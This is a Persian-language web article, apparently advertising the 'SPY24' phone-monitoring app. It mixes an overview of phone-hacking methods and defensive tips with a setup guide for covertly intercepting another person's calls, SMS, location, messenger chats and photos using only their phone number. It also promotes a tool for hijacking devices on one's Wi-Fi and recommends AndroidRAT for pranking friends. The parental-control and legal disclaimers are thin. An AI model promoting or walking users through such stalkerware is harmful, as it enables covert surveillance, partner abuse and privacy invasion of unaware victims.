آموزش شناخت انواع هک و روش های مقابلهآیا اینستاگرام من هک شده است؟!بهترین برنامه های هک گوشی اندرویدی آیفونهک آیفونهک تلگرام و نظارت بر عملکرد

دانلود برنامه هک گوشی رایگان | آپدیت مقاله

هک موبایل و روش های مقابله در برابر هک گوشی با توجه به افزایش تکنولوژی بسیاری از افراد جامعه کار های روزانه خود را با گوشی های موبایل خود انجام می دهند. از ابتدایی ترین کار ها مثل: تماس تلفنی و اس ام اس تا کار های حرفه ای تری مثل: پرداخت قبض, ارسال عکس و چت و یا بازی کردن را با گوشی موبایل خود انجام می دهند. هرچقدر افراد به صورت بیشتری با این تکنولوژی خو بگیرند امنیت داده های آنها مهمتر خواهد شد.

هک موبایل, یک کار بسیار تخصصی ست که افراد سودجو یا همان هکر ها از این روش استفاده می کنند تا اطلاعات مهم شما مثل عکس های خصوصی, رمز کارت های بانکی شما, شماره تماس های خصوصی شما و یا رمز های شبکه های اجتماعی شما را سرقت کنند و از این طریق از افراد اخاذی کنند.

با توجه به موارد گفته شده در این مقاله ما به شما آموزش خواهیم داد که هک موبایل از چه روش هایی انجام می گیرد و در نهایت روش های مقالبه در برابر هک گوشی را به شما آموزش خواهیم داد. تا اطلاعات عمومی و تخصصی شما در این زمینه افزایش پیدا کند.

بررسی روش های هک گوشی

در قسمت زیر معروفترین شگرد های هکر ها را برای شما معرفی کرده ایم:

هک به وسیله بلوتوث

بلوتوث جزو اولین تکنولوژی هایی بود که به گوشی های موبایل افزوده شد و هکر ها نیز اولین تکنیک های خود را از این طریق پیاده سازی می کرند. همانطور که قطعا اطلاع دارید این امکان در تمامی گوشی های های هوشمند قرار داده شده است تا افراد بتوانند فایل های خود را به اشتراک بگذارند. در اینجاست که هکر ها می توانند از طریق بلوتوث موبایل , شروع به هک کردن موبایل شما کنند و اطلاعات مهمی که دارید را سرقت کنند. برای اینکه هکر کار خود را شروع کند, باید در نزدیکی شما باشد و بلوتوث شما در وضعیت روشن باشد. در صورتی که این 2 حالت وجود نداشته باشد شما هک نخواهید شد.

هک چند ثانیه‌ای گوشی و تبلت بلوتوث

هک به وسیله وای فای

هکر ها همواره سعی می کنند شما را به سمت تله ای جذب کنند. یکی از این تله ها وای فای رایگان می باشد. به یاد داشته باشید که وای فای هایی که در مکان های عمومی  به صورت رایگان قرار دارند ممکن است تله یک هکر باشند. 

در روش هک به وسیله وای فای هکر دارای نرم افزار های پیشرفته ای ست و منتظر میماند تا به شبکه وای فای متصل شوید و پس از اتصال شما به شبکه شروع به شنود و دریافت اطلاعات ارسالی گوشی شما خواهد کرد و در اکثر موارد این اطلاعات را نیز ذخیره سازی می کنند. مثلا اگر خرید اینترنتی انجام دهید تمامی اطلاعات کارت شما به وسیله هکر دزدیده خواهد شد. 

برای استفاده از این روش هکر نیاز به یک شبکه وای فای دارد تا افرادی که به این شبکه وصل می شوند را رسد نماید و شروع به هک آنها نماید.

 

هک وای فای واقعی اندروید رایگان

هک موبایل با بکارگیری بد افزارها:

یکی از ساده ترین روش هایی که یک هکر می تواند موبایل افراد را هک کنید استفاده از نرم افزار های جاسوسی یا همان بدافزار ها ست. در این روش اگر هکر موفق شود نرم افزار جاسوسی را بر روی موبایل شما نصب کند, نرم افزار یاد شده شروع به جاسوسی خواهد کرد و در واقع تمامی اطلاعات موبایل شما به وسیله هکر سرقت خواهد شد.

این روش از هک نیاز به دانش بالایی ندارد و در واقع هر کسی با داشتن نرم افزار جاسوسی می تواند گوشی افراد دیگر را هک کند و به همین دلیل این روش یکی از محبوب ترین روش های هک در جهان می باشد. سعی کنید برای امنیت گوشی خود از دانلود کردن نرم افزار های ناشناس و یا نرم افزار های بدون اعتبار پرهیز کنید. 

حتما اسم نرم افزار هایی مثل نرم افزار های هک گوشی همسر و غیره را شنیده اید, تمامی این نرم افزار ها دقیقا به همین شکل کار می کنند و آخر اطلاعات شما به صورت کامل سرقت خواهد شد.

اینگونه بد افزار ها در شرایط کلی به 2 صورت عمل می کنند:

  • در بعضی از موارد این بد افزار وظیفه دارد تا تمامی اطلاعات از جمله عکس ها, لوکیشن فعلی شما, شماره تماس ها را برای هکر ارسال کند.
  • دسته دوم به صورت تخصصی طراحی شده اند و هدف آنها فقط برای بدست آوردن اطلاعات نرم افزار هایی مثل هک تلگرام, هک اینستاگرام می باشند.

توجه: یکی از مشهورترین این نرم افزار ها که برای هک موبایل استفاده می شود رات اندروید نام دارد. البته در صورتی که شما از گوشی های بروزرسانی شده استفاده کنید این بد افزار نمی تواند به گوشی موبایل شما آسیبی وارد کند. پس همواره سعی کنید سیستم عامل و آنتی ویروس گوشی موبایل خود را به روز رسانی نمایید.

androrat tutorial picateshackz min

هک گوشی با زدن رمز موبایل

در واقع این روش همیشه به وسیله دوستان و آشنایان انجام می گیرد و فرد مورد نظر پسورد موبایل را میداند و به این صورت وارد گوشی خواهد شد. برای آنکه بتوانید از این روش هک شدن در امان باشید بهتر است امنیت پسورد گوشی خود را افزایش دهید. در ادامه روش های دقیقتری را به شما آموزش خوهیم داد.

تا اینجای کار به صورت کلی درباره 4 روش نرم افزار هک گوشی بدون اجازه رایگان موبایل به شما آموزش هایی دادیم و در ادامه مقاله بهترین روش هایی که می توانید پیاده سازی کنید تا کمتر در خطر هک باشید را برای شما معرفی کرده ایم.

کاربردی ترین روش ها برای مقابله در برابر هک گوشی موبایل

همواره هکر ها در کمین شما هستند و شما باید سعی کنید تا برای مقابله با آنها آمادگی داشته باشید تا اطلاعات شما به وسیله آنها سرقت نشود در ادامه کاربردی ترین این روش ها را معرفی کرده ایم.

از وای فای های مجانی استفاده نکنید

همیشه امکانات رایگان و مجانی به صورت تله استفاده می شوند. پس شما هم باید هشیار باشید که هکر ها می توانند از طریق شبکه های وای فای اطلاعات شما را سرقت کنند. پس بهترین راه برای مقابله با این هکر ها این است که وارد تله آنها نشوید. زیرا اطلاعات گوشی شما ارزشمند تر از اندکی وای فای رایگان است.

رمز گوشی موبایل خود را قویتر انتخاب کنید.

روش بعدی برای مقابله در برابر هک گوشی افزایش امنیت رمز عبور موبایل می باشد. در بسیار از موارد دیده شده است که افراد برای گوشی موبایل خود رمز های بسیار ساده ای مثل تاریخ تولد و یا 1111 و موارد این چنینی را قرار می دهند. یا برای پترن (Pattern) حرف اول نام خودشان را می گذارند. در نتیجه هکر با کمی شانس و کمی فکر به سادگی می تواند رمز گوشی شما را هک کند. پس سعی کنید از رمز های متداول و بسیار ساده استفاده نکنید تا ایمنی گوشی موبایل خود را اینگونه افزایش دهید.

  • خاموش کردن بلوتوث

با توجه به افزایش تکنولوژی امروزه استفاده از بلوتوث کمرنگ تر شده است و دیگر نیاز ندارید تا به صورت دائم از این تکنولوژی استفاده کنید. فقط در زمان هایی که نیاز به بلوتوث دارید این امکان را روشن بگذارید. البته لازم به ذکر است خاموش کردن بلوتوث برای افزایش طول عمر باتری نیز تاثیر گذار است.

  • عدم دانلود اپلیکیشن های ناشناس

در بسیاری از موارد دیده شده است که در تلگرام و یا اینستاگرام لینک هایی به اشتراک گذاشته می شود, با اسم های جذابی مثل: نرم افزار افزایش سرعت اینترنت, اینترنت رایگان و غیره. این نرم افزار ها در بیشتر موارد بد افزار های جاسوسی اند و به این روش هکر قصد دارد شما را در تله بندازد. 

در موارد مشابه سایت ها شروع به باز کردن پاپ آپ هایی می کنند و بدون اطلاع شما شروع به دانلود اپلیکیشن می کنند. در صورتی که شما این اپ را نصب کنید هکر دسترسی به اطلاعات شما خواهد داشت. 

پس هیچ نرم افزار ناشسناسی را بر روی گوشی خود نصب نکنید و سعی کنید از مارکت های معروفی مثل کافه بازار, گوگل پلی, اپ استور اقدام به دانلود نرم افزار کنید. در صورتی که این نکته ایمنی را رعایت کنید شما در برابر هک با استفاده از بد افزار ها ایمن خواهید شد.

  • عدم باز کردن ایمیل های مشکوک

یکی دیگر از شگردهای رایج هکر ها ارسال ایمیل های احساسی و یا جذاب به کاربران می باشد و در انتهای این ایمیل یک فایل ضمیمه شده است که مثلا عکس زیبای من رو ببین! اما این فایل شامل بد افزاریست که در صورتی که آن را دانلود کنید گوشی موبایل شما هک خواهد شد.

ساده ترین راه برای مقابله با این شگرد هکر ها این است که اینگونه ایمیل ها را اصلا باز نکیند و در صورتی که ایمیل مورد نظر را باز کردید هیچ فایلی را از طریق ایمیل دانلود نکنید. به یاد داشته باشید که ممکن است لینک هایی که در داخل ایمیل قرار داده شده اند نیز شامل بد افزار باشند.

در صورتی که شما تمامی این 5 نکته را رعایت کنید تا حد زیادی میتوانید اطمینان داشته باشید که هک نخواهید شد و اطلاعات گوشی موبایل شما در خطر نخواهد بود.

ما در این مقاله به شما از رایجترین روش های هک موبایل گفتیم و شما را با شگرد های هکر ها آشنا کردیم. بعد از آن به روش های مقابله با هکر ها پرداختیم. ولی به یاد داشته باشید هکر ها همواره روش های جدیدی را ابداء می کنند و شما نیز باید مراقب باشید تا به دام هکر ها وارد نشوید.

امیدواریم که این مقاله برای شما مفید بوده باشه و توانسته باشید اطلاعات اختصاصی و عمومی شما را درباره هک گوشی موبایل افزایش داده باشیم.

برنامه SPY24  با چه مکانیزمی گوشی موبایل را هک می کند؟

روش کار این نرم افزار نقص ایمنی پیچیده ای نمی باشد, هکر از طریق برنامه SPY24  تمامی تماس های تلفنی فرد را به یک شنود و یا سیستم ذخیره سازی صدای آنلاین هدایت یا Route می کند و پس از آن تماس را به کاربر اصلی مسیریابی دوباره ای (Re-Route ) انجام می دهد. در واقع هکر با این برنامه یک حمله MITM یا Man In The Middle به فرد مورد نظر انجام می دهد.

نرم افزار جاسوسی

 

قسمت اول آموزش نصب نرم افزار SPY24 

تذکر : قسمت دوم این آموزش بعد از ثبت نام در سایت به ایمیل شما ارسال میگردد.

راهنمای استفاده از نرم افزار SPY24 

تذکر مهم: این نرم افزار تنها برای کنترل فرزندان و در واقع افراد زیر سن قانونی (-18) باید استفاده گردد. 

لطفا در این زمینه همکاری داشته باشید تا در نسخه های جدید ویژگی های جدیدی به این نرم افزار اضافه کنیم. در ابتدا نرم افزار را دانلود نمایید و آن را نصب کنید. پس از نصب نرم افزار را اجرا نمایید ( اتصال به اینترنت اجباریست). پس از اجرا یک صفحه جدید خواهید دید که در داخل آن اطلاعاتی مثل نام, فامیلی, شماره موبایل و ایمیل خود را در آن ثبت کنید.

راهنمای مربوط به بخش پنل کاربری

پس از آنکه ثبت نام را انجام دادید شما وارد برنامه خواهید شد و تصویری شبیه به شکل زیر را خواهید دید و باید این اطلاعات را به دقت پر نمایید:

  • شماره موبایل کودک را وارد کنید.
  • قسمت های گوشی همانند اس ام اس, تماس ها و غیره
  • نرم افزار هایی مثل: شبکه های اجتماعی که قصد دارید اطلاعات آن را دریافت کنید را تیک بزنید.
  • در نهایت بر روی گزینه سبز رنگی که بر روی آن نوشته شده است “دریافت” کلیک کنید و صبر کنید تا اطلاعات برای شما ارسال گردد.

تذکر: به یاد داشته باشید که مدت زمان دریافت اطلاعت گوشی کودکتان با توجه به سرعت اینترنت شما ممکن است متغیر باشد ( از 1 دقیق تا حداکثر ده دقیقه)

نمونه تضمین و کارکرد برنامه SPY24 

به دلیل جذب اطمینان شما و کارکرد صحیح نرم افزار SPY24  برای شما عزیزان همه مجوز های کامپیوتری و نرم افزاری در بخش اینترنت را در قسمت زیر برای شما قرار داده ایم.

آیا هک گوشی به وسیله شماره تلفن نیز امکان پذیر است؟

این امکان که هکر ها بتوانند از طریق شماره تلفن شما را هک کنند, از ضعف گوشی موبایل نیست و در واقع از زیر ساخت های مخابرات تلفن می باشد. در واقع این نوع هک به بد افزار ها و یا رمز عبور گوشی شما هیچ ارتباطی ندارد. در این روش هکر شبکه Mobile را هک می کند و گوشی موبایل شما هدف وی نمی باشد. البته این مسئله ترسناک و ناراحت کننده است, زیرا اگر از این طریق شما هک شوید به هیچ وجه از هک شدن خود اطلاع نخواهید یافت.

 نوهل یکی از کارشناسان حرفه ای آلمان در سخنرانی خود اعلام کرد

وی در مصاحبه خود گفته است که از طریق این روش میتوان تمامی تلفن ها را هک کرد و برند موبایل اصلا تاثیری در این روند نداد. در واقع هکر می تواند با استفاده از این روش تمامی شماره کارت های بانکی, شماره های تماس, موقعیت جغرافیایی کاربر, رمز های عبور ایمیل و غیره را سرقت کند. به دلیل اینکه اکثر مکانیزم های امنیتی Two Factor Authentication یا همان احراز هویت دو مرحله ای بر اساس شماره تماس می باشد.این آسیب پذیری برنامه SS7 جدید است و در سال 2015 این مورد گزارش گردیده است. در حال  حاظر بیشتر از 800 شرکت ارتباطی در زیر ساخت خود این آسیب پذیری را دارا می باشند.

این سامانه فقط برای نظارت ها بر روی فرزندان باید استفاده می شود و در غیر اینصورت بر اساس قوانین کشور عزیزمان ایران غیر قانونی می باشد.

تنها نیاز شما برای دریافت اطلاعات گوشی فرزندتان فقط نیاز به شماره تماس وی را دارید. لازم به ذکر است در صورتی که در زمان خرید ایمیل نداشتید می توانید از ایمیل روبرو استفاده کنید.   [email protected]

معرفی برنامه SPY24

با استفاده از برنامه SPY24  شما می توانید همواره در کنار کودکان خود باشید و در به وسیله این نرم افزار فعالیت های او را از جمله: تماس های تلفنی, اس ام اس ها, موقعیت جغرافیایی او, کار های او در شبکه های مجازی مثل تلگرام و اینستاگرام و غیره را بررسی کنید.

لازم به ذکر است سالمندان و مبتلایان به بیماری آلزایمر نیز همانند کودکان نیازمند به مراقبت های غیر مستقیم می باشند و استفاده از برنامه SPY24   این امکان را به شما می دهد که دور از آنها مراقبت نمایید.

هک گوشی با استفاده از نرم افزار SPY24 چیست؟

نرم افراز SPY24 یک از نرم افزار های که با قابلیت نصب بسیار ساده بر روی گوشی می توانید عملیات هک گوشی موبایل را انجام دهید و به این روش می توانید کودکان و یا سالمندان را ظیر نظر داشته باشید و از موقعیت جغرافی آنها  و یا فعالیت آنها اطلاعاتی بدست آورید.

این برنامه با اتصال به موبایل فرد مورد نظر دربازه های زمانی مشخصی شروع به ارسال اطلاعات دستگاه به سرور را می کند. در نهایت اطلاعات از طریق سرور به کامپیوتری که این برنامه بر روی آن اجرا شده است ارسال خواهد گردید.

لازم به ذکر است در صورتی که گوشی فرد مذکور دارای امنیت بالایی باشد عملکرد این نرم افزار به مشکل بر نخواهد خورد.

آیا می شود موبایل را هک کرد؟

با استفاده از نرم افزار هک گوشی موبایل و در واقع استفاده از نرم افزار هک گوشی موبایل میتوان کار ردیابی و دریافت اطلاعات یک گوشی را انجام داد. امکاناتی که این برنامه به شما می دهد عبارت است از:

  • اطلاع رسانی از تمامی اس ام اس های دریافتی و ارسالی و ردیابی MMS ها
  • توانایی خواندن ایمیل های ورودی و خروجی کاربر
  • پیام هایی اضطراری را از صورت بوک, اسکایپ و.. می توانید زیر نظر بگیرید.
  • مکالمات از طریق برنامه هایی مثل واتس آپ, وایبر و غیره را می توانید زیر نظر داشته باشید.
  • ردیابی از طریق GPS
  • شنود بر روی تمامی تماس های ورودی و خروجی
  • زیر نظر داشتن و کنترل مرورگر وب
  • زیر نظر داشتن بخش آلبوم های عکس و فیلم های کاربر 

دانلود نرم افزار هک موبایل به صورت رایگان

بهترین روش برای زیر نظر داشتن فرزندان خود با استفاده از نر م افزار SPY24

آیا می شود موبایل را از راه دور هک کرد؟

SS7  در دنیای امروزی ما یکی از پر استفاده ترین شبکه ها در جهان می باشد و وظیفه آن ایجاد ارتباط میان کاربران می باشد. اما این سیستم نیز دارای خطاهای امنیتی می باشد که در صورتی که هکر شماره تماس شما را داشته باشد, میتواند از طریق این حفره امنیتی گوشی موبایل شما را هک کند.

به عبارت دیگر شبکه SS7 به صورت زیر ساخت ارتباطات میان شهر ها و کشور های مختلف می باشد و هکر های خاصی می توانند با عبور از حفره های امنیتی آن و با دانستن شماره تلفن به اطلاعات کاربران دسترسی پیدا کنند. رفع مشکل این حفره امنیتی بسیار سخت است و نیاز به تغییرات بسیار پایه ای دارد.

لازم به ذکر است با توجه به موجود بودن این حفره امنیتی هم برنامه نویسان و همینطور افراد معمولی باید در راستای افزایش امنیت شخصی خود گام های را بردارند. هیچ اپلیکیشنی به صورت صد در صد امن نیست, جالب است بدانید فاکس بروستر در صفحه شخصی خود در یوتیوب گفته است که با استفاده از حفره امنیتی موجود در SS7 تلگرام و واتس آپ را توانسته است هک کند.

روش کار به اینگونه است که هکر با استفاده از این حفره امنیتی اپلیکیشن را دور میزند و به صورتی خود را نشان می دهد که گویی همان کاربر با شماره تماس حقیقی وی می باشد. سپس با زدن دکمه فراموشی رمز عبور, اپلیکیشن برای هکر یک پیام که شامل یک رمز یکبار مصرف می باشد ارسال می کند, در این شرایط هکر با استفاده از این کد وارد اپلیکیشن فرد خواهد شد و در واقع عکس ها و پیام ها و سایر اطلاعاتی که وی با این نرم افزار رد و بدل کرده است را بدست می آورد.

به یاد داشته باشید توماس فاکس-بروستر از این روش برای هک تلگرام و واتس آپ استفاده کرده است(2 نرم افزار قوی از نظر امنیت) و در واقع همین روش هک بر روی نرم افزار های دیگر هک نیز قابل اجرا می باشند. پس تا زمانی که راه حلی برای این حفره امنیتی پیدا شود بهتر است از دستورات امنیتی پیروی کنید تا هک نشوید.

به چه علتی رفع حفره امنیتی SS7 امکان پذیر نیست؟

همانطور که در قسمت قبل هم ذکر کردیم SS7 یک شبکه جهانیست و در واقع اپراتور های مخابراتی از سراسر دنیا بر روی آن کار می کنند و یک اپراتور به تنهایی حق تغییرات آن را ندارد. یا در شرایطی باید یک گروه از متخصصان به عنوان نمایندگان جهانی شروع به تغییرات بروی شبکه جهانی کنند.

به عبارت دیگر تا زمانی که یک توافق جهانی برای تغییرات بر روی SS7 صورت نگیرد این حفره امنیتی پا برجا خواهد بود.یکی از شایعه ها در این زمینه بیان می کند که سازمان های جاسوسی کشور های بزرگ مثل CIA و NSA برای ردگیری کاربران و شنود از این امکانات استفاده می کنند و به همین دلیل برای رفع حفره امنیتی SS7 سنگ اندازی می کنند. چون از این طریق بدون استفاده از الگوریتم های سخت می توانند کاربران بسیاری را در جهان زیر نظر خود داشته باشند.

چند نکته برای حفاظت از هک شدن:

چند نکته برای حفاظت از هک شدن:

اکر تا این لحظه تعجب کرده ایده و در ذهن خود سوال این چنینی مطرح شده است که : آیا فردی می تواند با تماس با شماره من می تواند من را هک کند؟ باید بدانید که جواب این سوال مثبت می باشد. در واقع در حال حاظر تعداد زیادی ربات و برنامه های هک با این ویژگی پیاده سازی شده اند.

برای مقابله با این هکر ها :

  • شماره خود را به هر فردی ندهید
  • اطلاعات گوشی خود را رمزنگاری کنید.
  • از پیام رسان های امنی که از رمزگذاری استفاده می کنند مثل Viber  استفاده کنید.

آیا امکان هک کردن گوشی موبایل وجود دارد؟

بله و با استفاده از نرم افزار SPY24 این کار امکان پذیر است.

آیا هک کردن موبایل همسر غیر قانونی ست؟

 بسیاری از افراد جامعه به این فکر می کنند که بر روی گوشی همسر خود بد افزار های جاسوسی و مخربی نصب کنند و از این طریق وی را زیر نظر داشته باشند. در اکثر موارد اینگونه افراد حق را به خود می دهند و می گویند این کار به صلاح اوست و من حق دارم همسرم را زیر نظر داشته باشم!!!!

اما باید این مسئله را بدانید این کار هک کردن موبایل می باشد و طبق قوانین کشور عزیزمات ایران این کار جرم می باشد. در قوانین ذکر شده است که هرگونه ورود غیر مجاز (بدون اجازه) به حریم خصوصی افراد غیر قانونیست و دارای حبس و جزای نقدی می باشد. البته در شرایط خاصی مثل امنیت ملی و موارد این چنینی دادگاه اجازه هک کردن موبایل را به صورت قانونی به افراد خاصی می دهد که البته این مورد 100% برای موارد بی ارزشی مثل هک موبایل همسر داده نمی شود. 

روش هایی که می توانید متوجه شوید گوشی موبایل شما هک شده است و یا خیر؟

  • عملکرد گوشی کند خواهد شد

اولین نشانه ای که می تواند نمایانگر این باشد که شما به هک شده اید آهسته شدن عملکرد گوشیست. البته این تنها یک نشانه است و در بعضی از موارد این کند شدن به دلیل پر شدن کارت حافظه و یا حافظه داخلی موبایل می تواند باشد. پس قبل از تصمیم گیری حتما این موارد را نیز چک نمایید.

  • تمام شدن سریع شارژ موبایل

دومین نشانه ای که می توانید به آن مشکوک شوید تمام شدن سریع شارژ موبایل شماست, به دلیل اینکه نرم افزار هک بر روی گوشی فعال است ممکن است شارژ شما سریعتر از معمول به اتمام برسد. لازم به ذکر است در بسیاری از موارد عمر باتری, شارژ نکردن باتری به صورت خوب نیز باعث اتمام سریع شارژ است و شاید هک نشده باشید.

  • تغییرات ناگهانی در آپلود و دانلود

در صورتی که در ترافیک مصرفی خود احساس کردید که تغییرات ناگهانی احساس کردید به این معناست که وضعیت گوشی موبایل شما در شرایط بحرانی قرار دارد و به احتمال زیاد هکر ها در حال دانلود اطلاعات از طریق گوشی شما می باشند و در واقع اطلاعات شما را به سرقت میبرند.

  • قطع تماس های تلفنی به صورت ناگهانی

در بعضی موارد امکان دارد تا تماس های تلفنی و ویدیویی شما بی دلیل قطع گردد, این امکان وجود دارد که گوشی مبایل شما به وسیله هکر ها, هک شده باشد.

  • ارسال و دریافت پیام های نامفهوم

در شرایطی که موبایل شما به صورت خود به خود پیام های نامفهومی را به دیگران ارسال می کند و یا پیام هایی که دریافت میکنید مفهوم نیست, این احتمال وجود دارد که گوشی شما در شرایط نا امنی قرار داده باشد.

  • دانلود نصب نرم افزار بدون اجازه کاربر

یکی از اصلی ترین نشانه ها در هک شدن این است که خود گوشی بدون اجازه شما شروع به دانلود نرم افزار هایی می کند. این مورد در اکثر موارد به این معناست که شما هک شده اید و باید در اولین زمان ممکن تدابیر امنیتی را اجرا کنید.

  • غیر فعال شدن نرم افزار ها

در صورتی که بعضی از نرم افزار های شما غیر فعال شده اند و دیگر قابلیت اجرا نداشته باشند این نیز می تواند یک نشانه باشد, البته در بعضی موارد قدیمی بودن سیستم عامل نیز نشانه های این چنینی را به همراه دارد.

  • عدم کارکرد نمایشگر در زمان نمایش وب سایت ها

در بعضی از موارد ممکن است با ورود به سایت های مشهوری, ظاهر سایت را به صورت عجیبی ببینید, و این می تواند دلیلی بر وجود بد افزار بر روی گوشی شما باشد.

  • افزایش ترافیک و هزینه قبض

در نهایت مهمترین عامل افزایش بی دلیل قبض موبایل شما می تواند نشان دهنده این باشد که شما هک شده اید. به عنوان مثال مصرف اینترنت شما چندین برابر شده است و یا تعداد ارسال اس ام اس های شما در یک ماه چند برابر افزایش یافته است. در واقع این به معناست که شما هک شده اید و هکر از طریق موبایل شما شروع به ارسال و دریافت اطلاعات کرده است.

آیا امکان هک کردن موبایل امکان پذیر ست؟

آیا امکان هک کردن موبایل امکان پذیر ست؟

این امکان وجود دارد که هکر با استفاده از یک اس ام اس که به همراه خود یک بد افزار دارد به موبایل شما رخنه کند و شروع به سرقت داده هایی مثل اطلاعات ایمیل های شما کند.

باید این مسئله را بدانید که پیام های آلوده می توانند انواع خرابی را به گوشی و یا تبلت های شما وارد کنند. این کار ممکن است با استفاده از یک لینک به سایتی آلوده نیز انجام گیرد. در آخرین تحقیقات انجام شده به وسیله شرکت  Check Point Research, مشخص شده که گوشی های هوشمند شرکت های بزرگی همچون سامسونگ، هواوی، ال‌جی و سونی در معرض هک شدن به وسیله اس ام اس می باشند.

مکانیزم هک کردن گوشی های اندروید به وسیله اس ام اس

در این روش از هک, فرد با استفاده از یک اس ام اس می تواند به کلیه تراکنش های ایمیل شما دست پیدا کند. در واقع سارق با استفاده از یک روش قدیمی سعی می کند تا تنظیمات گوشی را بروزرسانی کند و از این طریق تمامی دسترسی های مربوط به ایمیل در دست هکر قرار خواهد گرفت.

البته لازم به ذکر است هک هر موبایلی متفاوت است, زیرا ممکن است هکر نیاز به شماره IMSI  و یا کد PIN دستگاه باشد. اما همواره هکر تمام سعی خود را خواهد کرد تا اعتماد فرد را جلب کند تا صاحب دستگاه فکر کند این پیام تنها شامل یک سری تغییرات در تنظیمات گوشی اوست.

در واقع این مشکل از حفره امنیتی که در داخل تنظیمات هک گوشی موبایل می باشد نشئت می گیرد. در حال حاظر تمامی شرکت های سازنده گوشی های هوشمند در حال اصلاح این حفره های امنیتی هستند, ولی از طرفی هکر ها نیز راه های جدیدی برای دور زدن امنیت گوشی پیدا می کنند. لازم به ذکر است در بعضی از گوشی های سامسونگ حتی نیاز به کد شناسایی نیز وجود ندارد و هکر بدون این کد نیز گوشی را هک می کند.

تمامی شرکت های مهم متوجه وجود مسئله هک به وسیله اس ام اس در اندروید شده اند به عنوان مثال ال جی و سامسونگ به روزرسانی برای امنیت گوشی های خود داده اند و سعی کرده اند امنیت خود را افزایش دهند. اما دراین زمینه شرکت هواوی تا عرضه سری میت 30 خود آپدیتی برای افزایش امنیت ارائه نکرده است و شاید در چند ماه آینده این بروزرسانی عرضه شود. شرکت سونی به صورت کلی این حفره امنیتی را مردود کرده است و به عبارتی هیچ بروزرسانی را منتشر نخواهد کرد.

همانطور که متوجه شدید سیستم تنظیمات پیامکی دارای ضعف امنیتی ست. در صورتی که شرکت های بزرگ تولید کننده گوشی های موبایل های اندروید به این مسئله توجه نکنند آسیب های وارد شده به مردم بسیار خواهد بود. 

قسمت بد این موضوع این است که هکر نیاز به ابزار های پیشرفته ای ندارد و با دارا بودن یک مودم GSM و یا گوشی معمولی و با چند برنامه می توانند این پیامک های مخرب را طراحی و ارسال کنند.

برای حفظ امنیت خود در حال حاظر بهتر است پیامک های این چنینی را باز نکنید و تنظیماتی که به وسیله این پیامک ها ارسال می شوند را عملیاتی نکنید.

دسترسی از راه دور , رت (RAT) به چه معناست؟

Remote Access Trojan یا Remote Administration Tool در لغت به معنای دسترسی از راه دور است به صورت خلاصه شده به آن RAT  می گویند. به عبارت ساده تر به فرد (همان هکر) این امکان را می دهد تا از راه دور کنترل گوشی یا تبلت و حتی کامپیوتر را در دست بگیرد. 

در واقع در این روش هکر ها با استفاده از RAT سعی می کنند تا اطلاعات قربانیان خود را بدست آورند. در حال حاظر یکی از ابزار های بسیار پر کاربرد در زمینه هک است و برای افراد جامعه این گونه نرم افزار ها بسیار خطرناک است. در ادامه به چگونگی مار کردن رت میپردازیم.

در این روش به عنوان مثال دوست یا آشنای شما به شما یک فایل عکس و یا آهنگ و یا برنامه با فرمت mp3, exe  یا فرمت های عکس می دهد و می گوید این برنامه توانایی هک تلگرام را دارد و شما با خوشحالی شروع به استفاده از این نرم افزار می کند و امکان دارد که این نرم افزار در زمان اجرا ارور دهد و یا شاید هم اجرا شود و شما از نرم افزار یاد شده هم استفاده کنید, ولی در پشت صحنه در زمانی که برنامه اجرا می شود یک برنامه مخرب نیز اجرا می شود و در واقع هکر دسترسی به سیستم شما پیدا می کند. در نهایت شاید شما اصلا از این کار هکر نیز متوجه نشوید.

راهنمای آموزشی برای هک دستگاه های متصل به مودم

در این پست ما برای شما عزیزان برنامه ای را قرار داده ایم که با استفاده از آن می توانید گوشی ها و یا کامپیوتر اشخاصی که به مودم شما وصل شده اند را هک کنید. 

تذکر: این برنامه برای آگاهی بخشی و افزایش اطلاعات عمومی در دسترس قرار داده شده است.

در واقع با استفاده از این نرم افزار و به وسیله شبکه وایرلسی که دارید می توانید تمامی موبایل ها و کامپیوتر هایی که به این شبکه متصل شده اند را تحت کنترل خود در آورید.

★برای استفاده از این برنامه نیاز به روت کردن گوشی دارید★

هک گوشی های تلفن همراه اندروید 

★تذکر این برنامه برای سیستم های عالم android  ساخته شده است. ★

با معرفی کردن سایت ما به دوستان و آشنایان خود و لینک کردن سایت ما در وبلاگ ها و یا سایت های خود ما را حمایت کنید.

برترین نرم افزار هک گوشی موبایل اندروید رایگان

شاید برای شما هم این سوال بوجود آمده باشد که به چه روشی میتوان موبایل افراد دیگر را هک کرد!

یکی از ساده ترین و محبوبترین روش های هک مربوط می شود به استفاده از نرم افزار های خاص, که این کار را بدون هیچ دردسری برای شما مقدور کرده اند. ما در این مقاله سعی کرده ایم تا محبوبترین و برترین نرم افزار های هک موبایل اندروید رایگان را به شما معرفی نماییم.

در مقاله های پیشین ما به شما آموزش دادیم که نشانه های هک شدن گوشی موبایل شما چیست و روش هایی برای مقابله با آن را نیز به شما آموزش دادیم. در یکی دیگر از مقاله ها درباره چگونگی هک شدن موبایل و روش هایی که هکر ها استفاده می کنند صحبت کردیم. در ادامه این مقاله ما به شما درباره نرم افزار ها و یا برنامه های هک خواهیم گفت و در واقع این نرم افزار ها را به شما معرفی خواهیم کرد.

در حال حاظر تعداد بسیاری نرم افزار وجود دارد که کار هک گوشی را امکان پذیر کرده اند, باید خاطر نشان کنیم که بسیاری از این نرم افزار های معرفی شده کارایی بسیار ساده ای دارند و کاربر آنها فقط برای هک می باشد و به همین دلیل به آنها نرم افزار هک گوشی می گویند, هدف ما از معرفی این نرم افزار ها برای سرگرمی و سرکار گذاشتن دوستان و آشنایان است و از آنها برای سوء استفاده از دیگران استفاده نکنید.

تذکر: این نرم افزار ها که در این بخش به شما آموزش می دهیم در اکثر موارد برای هک مستقیم موبایل استفاده نمی شوند, و پس از نصب بر روی موبایل این امکان به کاربر داده می شود تا با استفاد از آن هک گوشی, هک شبکه وای فای و موارد این چنینی را فراهم آورد.

در صورتی که علاقه دارید با بهترین این نرم افزار ها آشنا شوید به ادامه مقاله ما توجه کنید و در صورتی که سوال و یا پیشنهادی داشتید می توانید از طریق نظرات با ما در ارتباط باشید.

نرم افزار AndroidRAT بهترین نرم افزار هک موبایل اندروید

